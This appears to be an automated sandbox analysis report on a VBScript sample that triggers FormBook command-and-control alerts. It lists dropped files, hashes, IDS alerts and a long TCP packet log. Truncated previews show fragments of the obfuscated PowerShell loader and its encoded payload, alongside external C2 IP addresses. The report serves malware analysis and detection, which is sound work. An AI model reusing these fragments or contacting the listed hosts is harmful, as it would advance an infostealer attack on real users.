                              File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 69993 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
                              Category:dropped
                              Size (bytes):69993
                              Entropy (8bit):7.99584879649948
                              Encrypted:true
                              SSDEEP:1536:iMveRG6BWC7T2g1wGUa5QUoaIB9ttiFJG+AOQOXl0Usvwr:feRG6BX6gUaHo9tkBHiUewr
                              MD5:29F65BA8E88C063813CC50A4EA544E93
                              SHA1:05A7040D5C127E68C25D81CC51271FFB8BEF3568
                              SHA-256:1ED81FA8DFB6999A9FEDC6E779138FFD99568992E22D300ACD181A6D2C8DE184
                              SHA-512:E29B2E92C496245BED3372578074407E8EF8882906CE10C35B3C8DEEBFEFE01B5FD7F3030ACAA693E175F4B7ACA6CD7D8D10AE1C731B09C5FA19035E005DE3AA
                              Malicious:false
                              Preview:MSCF....i.......,...................I.................oXAy .authroot.stl.Ez..Q6..CK..<Tk...p.k..1...3...[..%Y.f..."K.6)..[*I.hOB."..rK.RQ*..}f..f...}....9.|.....gA...30.,O2L...0..%.U...U.t.....`dqM2.x..t...<(uad.c...x5V.x..t..agd.v......i...KD..q(. ...JJ......#..'=. ...3.x...}...+T.K..!.'.`w .!.x.r.......YafhG..O.3....'P[..'.D../....n..t....R<..=\E7L0?{..T.f...ID...,...r....3z..O/.b.Iwx.. .o...a\.s........."..'.......<;s.[...l...6.)ll..B.P.....k.... k0.".t!/.,........{...P8....B..0(.. .Q.....d...q,\.$.n.Q.\.p...R..:.hr./..8.S<a.s...+#3....D..h1.a.0....{.9.....:e.......n.~G.{.M.1..OU.....B.Q..y_>.P{...}i.=.a..QQT.U..|!.pyCD@.....l..70..w..)...W^.`l...%Y.\................i..=hYV.O8W@P.=.r.=..1m..1....)\.p..|.c.3..t..[...).....l.{.Y....\S.....y....[.mCt....Js;...H....Q..F.....g.O...[..A.=...F[..z....k...mo.lW{`....O...T.g.Y.Uh.;m.'.N..f..}4..9i..t4p_bI..`.....Ie..l.P.... ...Lg......[....5g...~D.s.h'>n.m.c.7...-..P.gG...i$...v.m.b[.yO.P/*.YH.

                              C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506

                              Download File
                              Process:C:\Windows\System32\wscript.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):330
                              Entropy (8bit):3.221708400245809
                              Encrypted:false
                              SSDEEP:6:kKhGOXlEN+SkQlPlEGYRMY9z+4KlDA3RUeVlWI/Vt:pGOXlbkPlE99SNxAhUeVLVt
                              MD5:10CC8E4171181F40D3F3902F346989CF
                              SHA1:C6C21A031D7A5C0F69B96092C19E833F685CB2CF
                              SHA-256:103BCC6A1183F4644E456B6E4FBC8113C71830BD3ED212D8AF238BAAB63FA1D6
                              SHA-512:CA5DD1E1B785CE5A1339B3B5A3A6254E781E93D8D7596BD3ABD7876E832D0B740795656856FE008C92F4B40409C5EACE36B0D8F5E436C2FAA6AFD15996E16344
                              Malicious:false
                              Preview:p...... ...........:....(....................................................... ........M.........(.....wl....i...h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".b.3.6.8.5.3.8.5.a.4.7.f.d.a.1.:.0."...

                              C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                              Download File
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:modified
                              Size (bytes):11608
                              Entropy (8bit):4.886255615007755
                              Encrypted:false
                              SSDEEP:192:Pxoe5lpOdxoe56ib49Vsm5emdiVFn3eGOVpN6K3bkkjo5agkjDt4iWN3yBGHB9sT:lVib49+VoGIpN6KQkj2xkjh4iUx4cYK6
                              MD5:C7F7A26360E678A83AFAB85054B538EA
                              SHA1:B9C885922370EE7573E7C8CF0DDB8D97B7F6F022
                              SHA-256:C3D527BCA7A1D1A398F5BE0C70237BD69281601DFD7D1ED6D389B2FD8E3BC713
                              SHA-512:9F2F9DA5F4BF202A08BADCD4EF9CE159269EF47B657C6F67DC3C9FDB4EE0005CE5D0A9B4218DB383BAD53222B728B77B591CB5F41781AB30EF145CC7DB7D4F77
                              Malicious:false
                              Preview:PSMODULECACHE......e..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.............z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af

                              C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                              Download File
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):64
                              Entropy (8bit):1.1940658735648508
                              Encrypted:false
                              SSDEEP:3:Nlllulbnolz:NllUc
                              MD5:F23953D4A58E404FCB67ADD0C45EB27A
                              SHA1:2D75B5CACF2916C66E440F19F6B3B21DFD289340
                              SHA-256:16F994BFB26D529E4C28ED21C6EE36D4AFEAE01CEEB1601E85E0E7FDFF4EFA8B
                              SHA-512:B90BFEC26910A590A367E8356A20F32A65DB41C6C62D79CA0DDCC8D95C14EB48138DEC6B992A6E5C7B35CFF643063012462DA3E747B2AA15721FE2ECCE02C044
                              Malicious:false
                              Preview:@...e................................................@..........

                              C:\Users\user\AppData\Local\Temp\-507JlJ26-

                              Download File
                              Process:C:\Windows\SysWOW64\xcopy.exe
                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                              Category:dropped
                              Size (bytes):196608
                              Entropy (8bit):1.1239949490932863
                              Encrypted:false
                              SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                              MD5:271D5F995996735B01672CF227C81C17
                              SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                              SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                              SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                              Malicious:false
                              Preview:SQLite format 3......@ .......Y...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_b4c0somd.z5j.ps1

                              Download File
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:ASCII text, with no line terminators
                              Category:dropped
                              Size (bytes):60
                              Entropy (8bit):4.038920595031593
                              Encrypted:false
                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                              Malicious:false
                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_l1g2jvys.sae.psm1

                              Download File
                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              File Type:ASCII text, with no line terminators
                              Category:dropped
                              Size (bytes):60
                              Entropy (8bit):4.038920595031593
                              Encrypted:false
                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                              Malicious:false
                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pfnknd33.sdq.ps1

                              Download File
                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              File Type:ASCII text, with no line terminators
                              Category:dropped
                              Size (bytes):60
                              Entropy (8bit):4.038920595031593
                              Encrypted:false
                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                              Malicious:false
                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pvscwo21.fkk.psm1

                              Download File
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:ASCII text, with no line terminators
                              Category:dropped
                              Size (bytes):60
                              Entropy (8bit):4.038920595031593
                              Encrypted:false
                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                              Malicious:false
                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                              C:\Users\user\AppData\Roaming\Sagsgningerne.Int

                              Download File
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:ASCII text, with very long lines (65536), with no line terminators
                              Category:dropped
                              Size (bytes):464360
                              Entropy (8bit):5.959627268998177
                              Encrypted:false
                              SSDEEP:12288:3+Y872BjWy9pqF42Kt0g8Ic9P3oX+3YHJW09:3+7CBayTO8IP3oXVwA
                              MD5:C7906DD3AFFB5AB9D5B82F6E14064C4B
                              SHA1:BDC1903A713B8E82E10D1ACADA68110988885416
                              SHA-256:1BE80920D652FC9BF4CD1A46EEFCDED743B7D37B3EED7C13446974119BBD1795
                              SHA-512:AB65FEBD4EC13BC44A818D61585E7C072C2C4C4723E3F469004DB860A5135CA3BDD1AC0037938C68D38FDA920D59F73332213A3801F104DAD17EDB82338613B5
                              Malicious:false
                              Preview:6wJ9wXEBm7vQ6xwAcQGb6wIEPwNcJARxAZtxAZu5hxG0ZXEBm3EBm4HxzhaxrXEBm3EBm4HxSQcFyHEBm+sCLFbrAnnQ6wIjKbqNEtmn6wJ2w3EBm+sCf8jrAnfUMcpxAZtxAZuJFAvrAr1zcQGb0eJxAZvrAs87g8EE6wJYsXEBm4H58OY3BXzL6wKRausC24WLRCQE6wLnbnEBm4nDcQGbcQGbgcPuCzYE6wKTwnEBm7qeUNSJ6wKolnEBm4HydZTLo+sC0CHrAkfugcIVO+DV6wJ2hnEBm+sCE7pxAZvrArT5cQGbiwwQ6wKReXEBm4kME3EBm3EBm0LrAvKk6wIxioH65OIEAHXV6wIfHusCIKKJXCQM6wJYM3EBm4HtAAMAAHEBm+sCNDSLVCQIcQGbcQGbi3wkBHEBm3EBm4nr6wIlqOsCGDKBw5wAAADrAv8fcQGbU3EBm3EBm2pAcQGb6wIZ1Inr6wI8KHEBm8eDAAEAAADgVwXrAn3UcQGbgcMAAQAA6wKI4nEBm1NxAZvrAuW8ietxAZvrAtv1ibsEAQAAcQGb6wKfZ4HDBAEAAHEBm+sCiRFTcQGbcQGbav/rAtRJ6wL2q4PCBXEBm3EBmzH2cQGbcQGbMcnrAohWcQGbixrrAuV86wIPrUFxAZvrAmFYORwKdfNxAZtxAZtG6wKH8esCUVCAfAr7uHXd6wLg2esCXGuLRAr86wLJTOsCnFwp8HEBm3EBm//S6wJLQ+sCDeS65OIEAHEBm3EBmzHAcQGb6wLsBYt8JAzrApCB6wK7sIE0BzMTHYPrAgHZcQGbg8AEcQGbcQGbOdB15XEBm3EBm4n76wKsm3EBm//XcQGb6wJBPrf/e74gIHsG8Jr4CmbHp8Vu5P4CwZxwBBaS769SNm4CwfZP1oY6yQhmx0gK1qotFAt2nHJO44PQsuJAqUIJnHI7XsqvCsnaxz4Tb2gnBZzHPhOvzJelnPc+E7dqrX+cxz4Tb67r

                              Static File Info

                              General

                              File type:ASCII text, with very long lines (604), with CRLF line terminators
                              Entropy (8bit):5.156113050019584
                              TrID:
                                File name:01105751.vbs
                                File size:215'050 bytes
                                MD5:5c7e4886e009c7d2908ec633bf48cf8e
                                SHA1:72e9f5c65571b19402febfa7f36fc6ee5ce9a0f3
                                SHA256:c950aba2061fbb90b63122bec04b71764966e5554b6cd40114772c392464f748
                                SHA512:e7910dd42402712860ff660e699707d3c0ae6e4ba8eb8292a8a01de8a22a78bd86272f9668ae4fe260c9af499bbc8477d8d8df115a917040606be6c9cb7736f1
                                SSDEEP:6144:wyJITON4vsj1oLXVAFN6oDpLfcW6PGOYQO+17ezWSUqE19eAV/KE3JSlkiuqIQKi:lcKJkRH3Y
                                TLSH:0B24B3E3CF0A36181F8A2FC5A865CD828AF741B171152478D5EED6EDA183EACC1F8D15
                                File Content Preview:.. ..Rem stningsled aporobranchian lorgnettere brnesygdommes. udliciterings.. .. .. .. .. ..Rem Harmoniseres! ildnendes placarder swaddler sjuskedorter..Ha1 = Ha1 + "$Retorsionshandlingenllustrationer = 1;$Elytrigerous='S';$Elytrigerous+='ubstrin';$Elytri

                                File Icon

                                Icon Hash:68d69b8f86ab9a86

                                Network Behavior

                                Snort IDS Alerts

                                TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                05/02/24-17:15:19.980855TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34972780192.168.2.63.33.130.190
                                05/02/24-17:15:22.949006TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34972880192.168.2.63.33.130.190
                                05/02/24-17:15:04.232595TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24972580192.168.2.634.174.122.2

                                Network Port Distribution

                                TCP Packets

                                TimestampSource PortDest PortSource IPDest IP
                                May 2, 2024 17:13:09.641093016 CEST4971380192.168.2.687.121.105.54
                                May 2, 2024 17:13:09.808796883 CEST804971387.121.105.54192.168.2.6
                                May 2, 2024 17:13:09.809367895 CEST4971380192.168.2.687.121.105.54
                                May 2, 2024 17:13:09.809696913 CEST4971380192.168.2.687.121.105.54
                                May 2, 2024 17:13:09.978557110 CEST804971387.121.105.54192.168.2.6
                                May 2, 2024 17:13:09.982659101 CEST804971387.121.105.54192.168.2.6
                                May 2, 2024 17:13:09.982822895 CEST804971387.121.105.54192.168.2.6
                                May 2, 2024 17:13:09.982934952 CEST4971380192.168.2.687.121.105.54
                                May 2, 2024 17:13:09.983073950 CEST804971387.121.105.54192.168.2.6
                                May 2, 2024 17:13:09.983124971 CEST804971387.121.105.54192.168.2.6
                                May 2, 2024 17:13:09.983200073 CEST4971380192.168.2.687.121.105.54
                                May 2, 2024 17:13:09.983206034 CEST804971387.121.105.54192.168.2.6
                                May 2, 2024 17:13:09.983253002 CEST804971387.121.105.54192.168.2.6
                                May 2, 2024 17:13:09.983308077 CEST804971387.121.105.54192.168.2.6
                                May 2, 2024 17:13:09.983361006 CEST4971380192.168.2.687.121.105.54
                                May 2, 2024 17:13:09.983371973 CEST804971387.121.105.54192.168.2.6
                                May 2, 2024 17:13:09.983428001 CEST804971387.121.105.54192.168.2.6
                                May 2, 2024 17:13:09.983489037 CEST804971387.121.105.54192.168.2.6
                                May 2, 2024 17:13:09.983491898 CEST4971380192.168.2.687.121.105.54
                                May 2, 2024 17:13:09.983829021 CEST4971380192.168.2.687.121.105.54
                                May 2, 2024 17:13:10.150049925 CEST804971387.121.105.54192.168.2.6
                                May 2, 2024 17:13:10.150115967 CEST804971387.121.105.54192.168.2.6
                                May 2, 2024 17:13:10.150154114 CEST804971387.121.105.54192.168.2.6
                                May 2, 2024 17:13:10.150228977 CEST4971380192.168.2.687.121.105.54
                                May 2, 2024 17:13:10.150238037 CEST804971387.121.105.54192.168.2.6
                                May 2, 2024 17:13:10.150302887 CEST804971387.121.105.54192.168.2.6
                                May 2, 2024 17:13:10.150304079 CEST4971380192.168.2.687.121.105.54
                                May 2, 2024 17:13:10.150392056 CEST804971387.121.105.54192.168.2.6
                                May 2, 2024 17:13:10.150448084 CEST804971387.121.105.54192.168.2.6
                                May 2, 2024 17:13:10.150497913 CEST804971387.121.105.54192.168.2.6
                                May 2, 2024 17:13:10.150520086 CEST4971380192.168.2.687.121.105.54
                                May 2, 2024 17:13:10.150573969 CEST804971387.121.105.54192.168.2.6
                                May 2, 2024 17:13:10.150593996 CEST804971387.121.105.54192.168.2.6
                                May 2, 2024 17:13:10.150625944 CEST4971380192.168.2.687.121.105.54
                                May 2, 2024 17:13:10.150640011 CEST4971380192.168.2.687.121.105.54
                                May 2, 2024 17:13:10.150667906 CEST804971387.121.105.54192.168.2.6
                                May 2, 2024 17:13:10.150722027 CEST804971387.121.105.54192.168.2.6
                                May 2, 2024 17:13:10.150752068 CEST804971387.121.105.54192.168.2.6
                                May 2, 2024 17:13:10.150829077 CEST4971380192.168.2.687.121.105.54
                                May 2, 2024 17:13:10.150832891 CEST804971387.121.105.54192.168.2.6
                                May 2, 2024 17:13:10.150865078 CEST804971387.121.105.54192.168.2.6
                                May 2, 2024 17:13:10.150930882 CEST804971387.121.105.54192.168.2.6
                                May 2, 2024 17:13:10.150965929 CEST4971380192.168.2.687.121.105.54
                                May 2, 2024 17:13:10.150978088 CEST804971387.121.105.54192.168.2.6
                                May 2, 2024 17:13:10.150980949 CEST4971380192.168.2.687.121.105.54
                                May 2, 2024 17:13:10.151031971 CEST804971387.121.105.54192.168.2.6
                                May 2, 2024 17:13:10.151082993 CEST4971380192.168.2.687.121.105.54
                                May 2, 2024 17:13:10.151146889 CEST804971387.121.105.54192.168.2.6
                                May 2, 2024 17:13:10.151236057 CEST804971387.121.105.54192.168.2.6
                                May 2, 2024 17:13:10.151290894 CEST4971380192.168.2.687.121.105.54
                                May 2, 2024 17:13:10.318186045 CEST804971387.121.105.54192.168.2.6
                                May 2, 2024 17:13:10.318231106 CEST804971387.121.105.54192.168.2.6
                                May 2, 2024 17:13:10.318269014 CEST804971387.121.105.54192.168.2.6
                                May 2, 2024 17:13:10.318289995 CEST4971380192.168.2.687.121.105.54
                                May 2, 2024 17:13:10.318321943 CEST804971387.121.105.54192.168.2.6
                                May 2, 2024 17:13:10.318396091 CEST804971387.121.105.54192.168.2.6
                                May 2, 2024 17:13:10.318423986 CEST4971380192.168.2.687.121.105.54
                                May 2, 2024 17:13:10.318456888 CEST804971387.121.105.54192.168.2.6
                                May 2, 2024 17:13:10.318567991 CEST804971387.121.105.54192.168.2.6
                                May 2, 2024 17:13:10.318617105 CEST4971380192.168.2.687.121.105.54
                                May 2, 2024 17:13:10.318665028 CEST804971387.121.105.54192.168.2.6
                                May 2, 2024 17:13:10.318723917 CEST4971380192.168.2.687.121.105.54
                                May 2, 2024 17:13:10.318778992 CEST804971387.121.105.54192.168.2.6
                                May 2, 2024 17:13:10.318855047 CEST804971387.121.105.54192.168.2.6
                                May 2, 2024 17:13:10.318907022 CEST4971380192.168.2.687.121.105.54
                                May 2, 2024 17:13:10.318955898 CEST804971387.121.105.54192.168.2.6
                                May 2, 2024 17:13:10.319015026 CEST804971387.121.105.54192.168.2.6
                                May 2, 2024 17:13:10.319072962 CEST804971387.121.105.54192.168.2.6
                                May 2, 2024 17:13:10.319088936 CEST4971380192.168.2.687.121.105.54
                                May 2, 2024 17:13:10.319163084 CEST804971387.121.105.54192.168.2.6
                                May 2, 2024 17:13:10.319195986 CEST804971387.121.105.54192.168.2.6
                                May 2, 2024 17:13:10.319242001 CEST4971380192.168.2.687.121.105.54
                                May 2, 2024 17:13:10.319273949 CEST804971387.121.105.54192.168.2.6
                                May 2, 2024 17:13:10.319319963 CEST4971380192.168.2.687.121.105.54
                                May 2, 2024 17:13:10.319403887 CEST804971387.121.105.54192.168.2.6
                                May 2, 2024 17:13:10.319482088 CEST804971387.121.105.54192.168.2.6
                                May 2, 2024 17:13:10.319540977 CEST4971380192.168.2.687.121.105.54
                                May 2, 2024 17:13:10.319561005 CEST804971387.121.105.54192.168.2.6
                                May 2, 2024 17:13:10.319623947 CEST804971387.121.105.54192.168.2.6
                                May 2, 2024 17:13:10.319681883 CEST4971380192.168.2.687.121.105.54
                                May 2, 2024 17:13:10.319689035 CEST804971387.121.105.54192.168.2.6
                                May 2, 2024 17:13:10.319742918 CEST804971387.121.105.54192.168.2.6
                                May 2, 2024 17:13:10.319801092 CEST4971380192.168.2.687.121.105.54
                                May 2, 2024 17:13:10.319809914 CEST804971387.121.105.54192.168.2.6
                                May 2, 2024 17:13:10.319859028 CEST804971387.121.105.54192.168.2.6
                                May 2, 2024 17:13:10.319933891 CEST804971387.121.105.54192.168.2.6
                                May 2, 2024 17:13:10.319936037 CEST4971380192.168.2.687.121.105.54
                                May 2, 2024 17:13:10.320035934 CEST804971387.121.105.54192.168.2.6
                                May 2, 2024 17:13:10.320080996 CEST804971387.121.105.54192.168.2.6
                                May 2, 2024 17:13:10.320095062 CEST4971380192.168.2.687.121.105.54
                                May 2, 2024 17:13:10.320179939 CEST804971387.121.105.54192.168.2.6
                                May 2, 2024 17:13:10.320228100 CEST4971380192.168.2.687.121.105.54
                                May 2, 2024 17:13:10.320265055 CEST804971387.121.105.54192.168.2.6
                                May 2, 2024 17:13:10.320394993 CEST804971387.121.105.54192.168.2.6
                                May 2, 2024 17:13:10.320452929 CEST4971380192.168.2.687.121.105.54
                                May 2, 2024 17:13:10.320455074 CEST804971387.121.105.54192.168.2.6
                                May 2, 2024 17:13:10.320549011 CEST804971387.121.105.54192.168.2.6
                                May 2, 2024 17:13:10.320614100 CEST4971380192.168.2.687.121.105.54
                                May 2, 2024 17:13:10.320635080 CEST804971387.121.105.54192.168.2.6
                                May 2, 2024 17:13:10.320696115 CEST804971387.121.105.54192.168.2.6
                                May 2, 2024 17:13:10.320760965 CEST4971380192.168.2.687.121.105.54
                                May 2, 2024 17:13:10.320768118 CEST804971387.121.105.54192.168.2.6
                                May 2, 2024 17:13:10.320791006 CEST804971387.121.105.54192.168.2.6
                                May 2, 2024 17:13:10.320839882 CEST4971380192.168.2.687.121.105.54
                                May 2, 2024 17:13:10.320861101 CEST804971387.121.105.54192.168.2.6
                                May 2, 2024 17:13:10.320921898 CEST804971387.121.105.54192.168.2.6
                                May 2, 2024 17:13:10.320974112 CEST4971380192.168.2.687.121.105.54
                                May 2, 2024 17:13:10.320986986 CEST804971387.121.105.54192.168.2.6
                                May 2, 2024 17:13:10.321074963 CEST804971387.121.105.54192.168.2.6
                                May 2, 2024 17:13:10.321119070 CEST4971380192.168.2.687.121.105.54
                                May 2, 2024 17:13:10.487401009 CEST804971387.121.105.54192.168.2.6
                                May 2, 2024 17:13:10.487566948 CEST804971387.121.105.54192.168.2.6
                                May 2, 2024 17:13:10.487647057 CEST4971380192.168.2.687.121.105.54
                                May 2, 2024 17:13:10.487855911 CEST804971387.121.105.54192.168.2.6
                                May 2, 2024 17:13:10.488020897 CEST804971387.121.105.54192.168.2.6
                                May 2, 2024 17:13:10.488034010 CEST804971387.121.105.54192.168.2.6
                                May 2, 2024 17:13:10.488045931 CEST804971387.121.105.54192.168.2.6
                                May 2, 2024 17:13:10.488056898 CEST804971387.121.105.54192.168.2.6
                                May 2, 2024 17:13:10.488069057 CEST804971387.121.105.54192.168.2.6
                                May 2, 2024 17:13:10.488080025 CEST4971380192.168.2.687.121.105.54
                                May 2, 2024 17:13:10.488080025 CEST804971387.121.105.54192.168.2.6
                                May 2, 2024 17:13:10.488171101 CEST4971380192.168.2.687.121.105.54
                                May 2, 2024 17:13:10.488171101 CEST4971380192.168.2.687.121.105.54
                                May 2, 2024 17:13:10.488704920 CEST804971387.121.105.54192.168.2.6
                                May 2, 2024 17:13:10.488718033 CEST804971387.121.105.54192.168.2.6
                                May 2, 2024 17:13:10.488728046 CEST804971387.121.105.54192.168.2.6
                                May 2, 2024 17:13:10.488759041 CEST4971380192.168.2.687.121.105.54
                                May 2, 2024 17:13:10.488794088 CEST4971380192.168.2.687.121.105.54
                                May 2, 2024 17:13:10.488866091 CEST804971387.121.105.54192.168.2.6
                                May 2, 2024 17:13:10.488878012 CEST804971387.121.105.54192.168.2.6
                                May 2, 2024 17:13:10.488888979 CEST804971387.121.105.54192.168.2.6
                                May 2, 2024 17:13:10.488960981 CEST4971380192.168.2.687.121.105.54
                                May 2, 2024 17:13:10.489214897 CEST804971387.121.105.54192.168.2.6
                                May 2, 2024 17:13:10.489227057 CEST804971387.121.105.54192.168.2.6
                                May 2, 2024 17:13:10.489237070 CEST804971387.121.105.54192.168.2.6
                                May 2, 2024 17:13:10.489248037 CEST804971387.121.105.54192.168.2.6
                                May 2, 2024 17:13:10.489259005 CEST804971387.121.105.54192.168.2.6
                                May 2, 2024 17:13:10.489269972 CEST804971387.121.105.54192.168.2.6
                                May 2, 2024 17:13:10.489274979 CEST4971380192.168.2.687.121.105.54
                                May 2, 2024 17:13:10.489281893 CEST804971387.121.105.54192.168.2.6
                                May 2, 2024 17:13:10.489320040 CEST4971380192.168.2.687.121.105.54
                                May 2, 2024 17:13:10.489320040 CEST4971380192.168.2.687.121.105.54
                                May 2, 2024 17:13:10.489362955 CEST804971387.121.105.54192.168.2.6
                                May 2, 2024 17:13:10.490025043 CEST804971387.121.105.54192.168.2.6
                                May 2, 2024 17:13:10.490036964 CEST804971387.121.105.54192.168.2.6
                                May 2, 2024 17:13:10.490048885 CEST804971387.121.105.54192.168.2.6
                                May 2, 2024 17:13:10.490065098 CEST804971387.121.105.54192.168.2.6
                                May 2, 2024 17:13:10.490072012 CEST4971380192.168.2.687.121.105.54
                                May 2, 2024 17:13:10.490076065 CEST804971387.121.105.54192.168.2.6
                                May 2, 2024 17:13:10.490087986 CEST804971387.121.105.54192.168.2.6
                                May 2, 2024 17:13:10.490089893 CEST4971380192.168.2.687.121.105.54
                                May 2, 2024 17:13:10.490102053 CEST804971387.121.105.54192.168.2.6
                                May 2, 2024 17:13:10.490113020 CEST804971387.121.105.54192.168.2.6
                                May 2, 2024 17:13:10.490123034 CEST4971380192.168.2.687.121.105.54
                                May 2, 2024 17:13:10.490153074 CEST4971380192.168.2.687.121.105.54
                                May 2, 2024 17:13:10.490828037 CEST804971387.121.105.54192.168.2.6
                                May 2, 2024 17:13:10.490881920 CEST4971380192.168.2.687.121.105.54
                                May 2, 2024 17:13:10.491112947 CEST804971387.121.105.54192.168.2.6
                                May 2, 2024 17:13:10.491125107 CEST804971387.121.105.54192.168.2.6
                                May 2, 2024 17:13:10.491137028 CEST804971387.121.105.54192.168.2.6
                                May 2, 2024 17:13:10.491147995 CEST804971387.121.105.54192.168.2.6
                                May 2, 2024 17:13:10.491159916 CEST804971387.121.105.54192.168.2.6
                                May 2, 2024 17:13:10.491166115 CEST4971380192.168.2.687.121.105.54
                                May 2, 2024 17:13:10.491173029 CEST804971387.121.105.54192.168.2.6
                                May 2, 2024 17:13:10.491209030 CEST4971380192.168.2.687.121.105.54
                                May 2, 2024 17:13:10.491269112 CEST4971380192.168.2.687.121.105.54
                                May 2, 2024 17:13:10.491889954 CEST804971387.121.105.54192.168.2.6
                                May 2, 2024 17:13:10.492037058 CEST804971387.121.105.54192.168.2.6
                                May 2, 2024 17:13:10.492048979 CEST804971387.121.105.54192.168.2.6
                                May 2, 2024 17:13:10.492059946 CEST804971387.121.105.54192.168.2.6
                                May 2, 2024 17:13:10.492070913 CEST804971387.121.105.54192.168.2.6
                                May 2, 2024 17:13:10.492082119 CEST804971387.121.105.54192.168.2.6
                                May 2, 2024 17:13:10.492093086 CEST804971387.121.105.54192.168.2.6
                                May 2, 2024 17:13:10.492115021 CEST4971380192.168.2.687.121.105.54
                                May 2, 2024 17:13:10.492115021 CEST4971380192.168.2.687.121.105.54
                                May 2, 2024 17:13:10.492119074 CEST804971387.121.105.54192.168.2.6
                                May 2, 2024 17:13:10.492157936 CEST4971380192.168.2.687.121.105.54
                                May 2, 2024 17:13:10.492158890 CEST4971380192.168.2.687.121.105.54
                                May 2, 2024 17:13:10.492178917 CEST804971387.121.105.54192.168.2.6
                                May 2, 2024 17:13:10.492651939 CEST804971387.121.105.54192.168.2.6
